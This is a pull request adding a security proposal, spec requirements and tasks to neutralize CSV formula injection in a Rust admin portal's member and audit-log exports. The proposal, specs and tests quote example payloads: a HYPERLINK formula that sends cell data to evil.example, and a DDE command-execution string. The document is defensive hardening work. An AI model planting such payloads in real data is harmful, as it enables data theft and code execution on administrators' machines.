### PR TITLE
audit-only: 1 proposal(s) from security-bug

### DIFF
--- a/openspec/changes/secure-neutralize-csv-formula-injection/proposal.md
+++ b/openspec/changes/secure-neutralize-csv-formula-injection/proposal.md
@@ -1,0 +1,75 @@
+## Why
+
+The admin CSV exports neutralize commas/quotes/newlines per RFC 4180 but
+do NOT neutralize spreadsheet **formula injection** (CWE-1236). The
+shared field writer `push_csv` in `src/web/portal/admin/csv.rs:9-20`
+only wraps each value in double quotes and doubles internal quotes; it
+never guards a leading `=`, `+`, `-`, or `@`.
+
+Two exports feed attacker-controlled free text through this writer:
+
+- **Member roster export** — `build_members_csv` in
+  `src/web/portal/admin/members/bulk.rs:118-166` emits `email`,
+  `username`, `full_name`, `discord_id`, and `notes` via `push_csv`.
+- **Audit-log export** — `audit_log_export` in
+  `src/web/portal/admin/audit.rs:207-228` emits `actor_name`,
+  `entity_id`, `old_value`, and `new_value` via `push_csv`.
+
+The input is attacker-controlled at an **unauthenticated** trust
+boundary: `POST /public/signup` (`src/api/handlers/public.rs:73-145`)
+accepts `full_name`, `username`, and `email` and applies no character
+restrictions (the only checks are `email.contains('@')` and password
+strength — see `src/api/handlers/public.rs:97-105`).
+`MemberService::create` (`src/service/member_service/create.rs:24-48`)
+and the repository persist the values verbatim. So an anonymous attacker
+can register with `full_name` =
+`=HYPERLINK("https://evil.example/?l="&A1&A2,"click")` (or a
+`=WEBSERVICE(...)` / DDE `=cmd|'/c calc'!A1` payload). The same value
+also lands in audit `new_value` / `actor_name` fields.
+
+Concrete harm: when an admin later downloads
+`GET /portal/admin/members/export` (or `/portal/admin/audit/export`)
+and opens it in Excel or LibreOffice Calc, the cell is evaluated as a
+formula. Depending on the spreadsheet and its settings this enables
+silent data exfiltration of other cells (`=HYPERLINK` / `=WEBSERVICE` /
+`=IMPORTDATA`) or, via DDE, command execution on the admin's
+workstation. The attacker needs no account approval — a `Pending`
+signup row is included by the unfiltered export (`bulk.rs:30-84` exports
+every status).
+
+## What Changes
+
+- Add a formula-neutralizing field writer alongside `push_csv` in
+  `src/web/portal/admin/csv.rs`. For values whose first character is a
+  formula trigger (`=`, `+`, `-`, `@`) or a control character a
+  spreadsheet may treat as starting a formula (TAB `\t`, CR `\r`, LF
+  `\n`), it prepends a single quote (`'`) **inside** the RFC 4180
+  quoting so the spreadsheet renders the cell as literal text. All
+  existing RFC 4180 quote-doubling behavior is preserved.
+- Route the attacker-controlled free-text columns of the member export
+  (`email`, `username`, `full_name`, `discord_id`, `notes`) and the
+  audit export (`actor_name`, `entity_id`, `old_value`, `new_value`)
+  through the new writer. Numeric / timestamp / enum / boolean columns
+  (e.g. `is_admin`, `joined_at`, `status`) keep using plain `push_csv`,
+  so no numeric or date column is converted to text.
+- Add unit tests asserting a formula-leading value is prefixed with `'`
+  and that ordinary values (e.g. `O'Brien, Sean`) are unchanged.
+
+This is a hardening of the export writers only; the CSV column set,
+ordering, headers, filters, and audit behavior are unchanged.
+
+## Impact
+
+- `src/web/portal/admin/csv.rs` — add the neutralizing writer (new
+  `pub fn`); keep `push_csv` for non-user columns.
+- `src/web/portal/admin/members/bulk.rs` — `build_members_csv` uses the
+  new writer for the five free-text columns.
+- `src/web/portal/admin/audit.rs` — `audit_log_export` uses the new
+  writer for the four free-text columns.
+- Specs: `bulk-member-csv-export` and `admin-audit-log` gain a
+  formula-neutralization requirement (this change's spec deltas).
+- Note: the bulk CSV **import** parser
+  (`src/web/portal/admin/members/bulk.rs:342-487`) reads a different
+  header set (`membership_type_slug`, not the export's
+  `membership_type`), so it is not a clean re-import of the export and
+  the added leading `'` does not corrupt an import round-trip.

--- a/openspec/changes/secure-neutralize-csv-formula-injection/specs/admin-audit-log/spec.md
+++ b/openspec/changes/secure-neutralize-csv-formula-injection/specs/admin-audit-log/spec.md
@@ -1,0 +1,12 @@
+## ADDED Requirements
+
+### Requirement: Audit-log CSV export neutralizes spreadsheet formula injection
+
+The audit-log CSV export (`GET /portal/admin/audit/export`) SHALL neutralize spreadsheet formula injection (CWE-1236) in its member-influenced free-text columns (`actor_name`, `entity_id`, `old_value`, `new_value`), whose values can be set by an attacker (for example, a member's chosen name recorded in an audit detail row).
+
+Specifically, when one of these field values begins with a formula-trigger character (`=`, `+`, `-`, `@`) or with a control character (TAB, CR, LF), the export SHALL prefix the value with a single quote (`'`) inside the RFC 4180 double-quoting so spreadsheet applications render the cell as literal text. Server-controlled columns (`timestamp`, `actor_id`, `action`, `entity_type`, `ip_address`) SHALL NOT be altered by this neutralization.
+
+#### Scenario: Formula-leading audit value is neutralized
+
+- **WHEN** an `audit_logs` row's `new_value` begins with `=` and an admin exports the audit log
+- **THEN** the exported CSV field SHALL begin with a single quote immediately after the opening double-quote so a spreadsheet opens it as text, not a formula

--- a/openspec/changes/secure-neutralize-csv-formula-injection/specs/bulk-member-csv-export/spec.md
+++ b/openspec/changes/secure-neutralize-csv-formula-injection/specs/bulk-member-csv-export/spec.md
@@ -1,0 +1,19 @@
+## ADDED Requirements
+
+### Requirement: Exported CSV neutralizes spreadsheet formula injection
+
+The member roster export SHALL neutralize spreadsheet formula injection (CWE-1236) in its member-controlled free-text columns (`email`, `username`, `full_name`, `discord_id`, `notes`), which originate from the unauthenticated `POST /public/signup` endpoint and other member-editable surfaces with no character restrictions.
+
+Specifically, when one of these field values begins with a formula-trigger character (`=`, `+`, `-`, `@`) or with a control character a spreadsheet may treat as starting a formula (TAB, CR, LF), the CSV writer SHALL prefix the value with a single quote (`'`) inside the RFC 4180 double-quoting so spreadsheet applications render the cell as literal text rather than evaluating it.
+
+Numeric, timestamp, enum, and boolean columns (e.g. `id`, `status`, `joined_at`, `dues_paid_until`, `is_admin`, `bypass_dues`, `email_verified_at`) are not member-controlled and SHALL NOT be altered by this neutralization.
+
+#### Scenario: Formula-leading member name is neutralized
+
+- **WHEN** a member's `full_name` is `=HYPERLINK("http://evil.example","click")` and an admin exports the roster
+- **THEN** the corresponding CSV field SHALL begin with a single quote immediately after the opening double-quote (e.g. `"'=HYPERLINK(...)"`) so a spreadsheet opens it as text, not a formula
+
+#### Scenario: Ordinary values are not prefixed
+
+- **WHEN** a member's `full_name` is `O'Brien, Sean` (no leading formula trigger)
+- **THEN** the CSV field SHALL be quoted per RFC 4180 with no single quote injected after the opening double-quote, and the internal apostrophe SHALL be preserved unchanged

--- a/openspec/changes/secure-neutralize-csv-formula-injection/tasks.md
+++ b/openspec/changes/secure-neutralize-csv-formula-injection/tasks.md
@@ -1,0 +1,23 @@
+## 1. Add a formula-neutralizing CSV field writer
+
+- [ ] 1.1 In `src/web/portal/admin/csv.rs`, add `pub fn push_csv_user(out: &mut String, value: &str)`. It SHALL behave exactly like `push_csv` (always wrap in double quotes; double every internal `"`) but, when `value`'s FIRST character is one of `=`, `+`, `-`, `@`, `\t`, `\r`, or `\n`, it SHALL emit a single quote `'` immediately after the opening `"` and before the value, so a spreadsheet renders the cell as literal text. An empty value SHALL stay empty-quoted (`""`).
+- [ ] 1.2 Keep `push_csv` unchanged so non-user columns (numbers, dates, enums, booleans) are not altered.
+- [ ] 1.3 Add unit tests in `src/web/portal/admin/csv.rs` under `#[cfg(test)]`:
+  - `push_csv_user_neutralizes_leading_equals`: input `=HYPERLINK("x","y")` produces a field beginning with `"'=HYPERLINK` (a `'` directly after the opening quote).
+  - `push_csv_user_neutralizes_plus_minus_at_and_controls`: inputs `+1`, `-1`, `@x`, and a leading tab each get the `'` prefix.
+  - `push_csv_user_leaves_ordinary_values_unquoted_inside`: input `O'Brien, Sean` produces `"O'Brien, Sean"` with NO leading `'` injected after the opening quote, and the internal apostrophe is unchanged.
+  - `push_csv_user_doubles_internal_quotes`: input `say "hi"` produces `"say ""hi"""`.
+
+## 2. Route member-export free-text columns through the new writer
+
+- [ ] 2.1 In `src/web/portal/admin/members/bulk.rs::build_members_csv`, replace `push_csv` with `push_csv_user` for the member-controlled free-text columns only: `r.email`, `r.username`, `r.full_name`, the `r.discord_id` value, and the `r.notes` value. Leave `id`, `status`, `membership_type`, the `joined_at` / `dues_paid_until` / `email_verified_at` timestamps, and the `is_admin` / `bypass_dues` booleans on plain `push_csv`.
+- [ ] 2.2 Update the import of `csv` helpers at the top of `build_members_csv` (currently `use crate::web::portal::admin::csv::push_csv;`) to also bring in `push_csv_user`.
+
+## 3. Route audit-export free-text columns through the new writer
+
+- [ ] 3.1 In `src/web/portal/admin/audit.rs::audit_log_export`, replace `push_csv` with `push_csv_user` for the attacker-influenced free-text columns: `actor_name`, `entity_id`, `old_value`, and `new_value`. Leave the server-controlled columns (`created_at` timestamp, `actor_id`, `action`, `entity_type`, `ip_address`) on plain `push_csv`.
+- [ ] 3.2 Update the `use crate::web::portal::admin::csv::push_csv;` import in `src/web/portal/admin/audit.rs` to also import `push_csv_user`.
+
+## 4. Regression test for the member export
+
+- [ ] 4.1 Add an integration test (e.g. `tests/admin_members_export_csv_injection.rs`, or extend the existing member-export test if one exists) that: creates a member whose `full_name` is `=cmd|'/c calc'!A1`, calls the export path so `build_members_csv` runs over rows including that member, and asserts the produced CSV contains the neutralized field `"'=cmd` (leading `'` after the opening quote) and does NOT contain a bare `,=cmd` / `"=cmd` start-of-field formula. Prefer asserting on `build_members_csv` directly with a constructed `MemberExportRow` if exercising the full HTTP path requires admin-session setup the test harness doesn't already provide.


### PR DESCRIPTION
This PR ships audit-produced proposals only — no implementer changes this iteration.

## Audit-produced proposals

- audit: security-bug proposals (1 change(s))

Each `audit: <type>` commit creates new `openspec/changes/<prefix>-*` directories that the next polling iteration will pick up via `list_pending` and route to the implementer.
